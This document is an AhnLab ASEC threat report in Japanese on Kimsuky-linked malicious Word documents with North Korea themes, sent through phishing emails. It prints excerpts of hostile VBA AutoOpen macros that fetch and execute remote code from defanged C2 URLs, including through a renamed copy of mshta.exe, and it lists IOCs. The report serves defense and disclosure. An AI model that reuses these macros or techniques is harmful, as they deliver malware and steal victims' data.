ASEC 分析チームは、対北朝鮮に関する内容の不正な Word ドキュメントが継続的に拡散していることを確認した。確認された Word ドキュメントは AhnLab TIP に公開された「2021年 Kimsuky 攻撃ワード(word)ドキュメント事例総整理解析レポート」および「外交/安全保障関連の内容の Word ドキュメントが拡散中」において共有した Word ドキュメントのタイプと併せて、mshta を利用するタイプが確認された。
不正な Word ドキュメントは、以下のように様々なファイル名で配布されている。
- キム** 履歴書(韓米**協会,220711).doc
- ヤン**_**財団中間報告(220716).doc
- 諮問要請書.doc
- タイプ 1
諮問要請書.doc の不正な Word ドキュメントは、以下のメールを通じて配布されたものと推定される。攻撃者は、韓国国内の機関を詐称してレポートの作成に関する諮問を要請するための内容が含まれたメールを送信した。

メールに直接 Word ドキュメントを添付せず、ユーザーがそのメールに肯定的に返信した場合のみ、以下のように Word ドキュメントをダウンロードできる不正な URL を挿入して返信していることが確認された。


上記メールに挿入されたリンクをクリックすると、以下のようにさらなる不正な URL が含まれたページが確認できる。

右下の「ダウンロード」をクリックすると hxxps://accounts.serviceprotect[.]eu/signin/v2/identifier?hl=kr&passive=true&<省略>rtnurl=aHR0cHM6Ly9kb2NzLmdv<省略>に接続する。現在この URL への接続は不可能だが、URL のアドレスから判断するとユーザーのログイン情報を収集したものと推定され、rtnurl パラメータ値のアドレスから、不正な Word ドキュメントをダウンロードしたものと見られる。
確認された Word ドキュメントを開くと、以下のようにマクロの実行を誘導するメッセージが、ハングルで作成された画像によって挿入されている。その後、ユーザーがコンテンツの有効化ボタンをクリックすると諮問要請に関連する内容が表示されるため、ユーザーが不正なファイルであることに気づきにくい。


Word ドキュメントには VBA マクロが含まれており、特定の URL に接続する振る舞いを実行する。以下はマクロコードの一部である。
Sub Reserve(pth)
Documents.Add
cnt = "On Error Resume Next:Set mx = CreateObje" & "ct(""Microsoft.XMLHTTP""):mx.open ""GET"", ""hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1"", False:mx.Send:Execute(mx.responseText)"
Sub AutoOpen()
On Error Resume Next
pw = "1qaz2wsx"
Weed pw
obt = "winmgmts:win32_process"
Set wm = GetObject(obt)
pth = Templates(1).Path & "\version.ini"
cd = "wscript.exe //e:vbscript //b"
wm.Create cd & pth
End Sub
マクロが実行されると AppData\Roaming\Microsoft\Templates フォルダーに version.ini ファイルを生成する。その後 wscript.exe を通じて生成した ini ファイルを実行する。
- wscript.exe //e:vbscript //b %AppData%\Microsoft\Templates\version.ini
On Error Resume Next:Set mx = CreateObject(“Microsoft.XMLHTTP”):mx.open “GET”, “hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1”, False:mx.Send:Execute(mx.responseText) |
現在は URL に接続が不可能なため以降の振る舞いは確認できないが、以前に確認された「炭素排出専門企業をターゲットにした Word ドキュメントによる攻撃」と同じくユーザー PC の情報流出等の振る舞いが実行されたであろうと推定される。
- タイプ 2
このタイプは特定のウェビナーの日程に関連する内容で配布されており、mshta を通じて C2 に接続する振る舞いを実行する。タイプ1と同様に Word ドキュメントを開くとマクロの実行を誘導する画像が挿入されており、ユーザーがコンテンツの有効化ボタンをクリックすると、以下のように対北朝鮮関連のトピックのウェビナー内容が表示される。

確認された Word ドキュメントにも VBA マクロが含まれており、以下はドキュメントに含まれたマクロコードの一部である。
Sub AutoOpen()
jsfds = "cmd /c copy %windir%\system32\mshta.exe %tmp%\gtfmon.exe"
Shell jsfds, 0
jsfds = "cmd /c timeout /t 7 >NUL && %tmp%\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php"
Shell jsfds, 0
End Sub
マクロを実行すると mshta.exe を TEMP フォルダーに gtfmon.exe という名前でコピーしたあと、cmd コマンドを通じて特定の URL に接続を試みる。
- cmd /c timeout /t 7 >NUL && %tmp%\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php
タイプ1と同様に、現在は上記 URL に接続が不可能であり、それ以降の振る舞いは確認できないが、ユーザー PC 情報の流出等の不正な振る舞いが行われたであろうと推定される。
対北朝鮮関連の内容を含む不正な Word ドキュメントが持続的に確認されているため、ユーザーの注意が必要である。特に、正常なユーザーを詐称して不正なドキュメントを配布する状況が確認されているため、メール送信者のアドレスを確認し、添付ファイルの閲覧および本文に含まれるリンクをクリックする際は注意しなければならない。
[ファイル検知]
Downloader/DOC.Kimsuky
[IOC]
357ef37979b02b08120895ae5175eb0a (doc)
7fe055d5aa72bd50470da61985e12a8a (doc)
hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1
hxxp://freunkown1.sportsontheweb[.]net/h.php
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報
[…] […]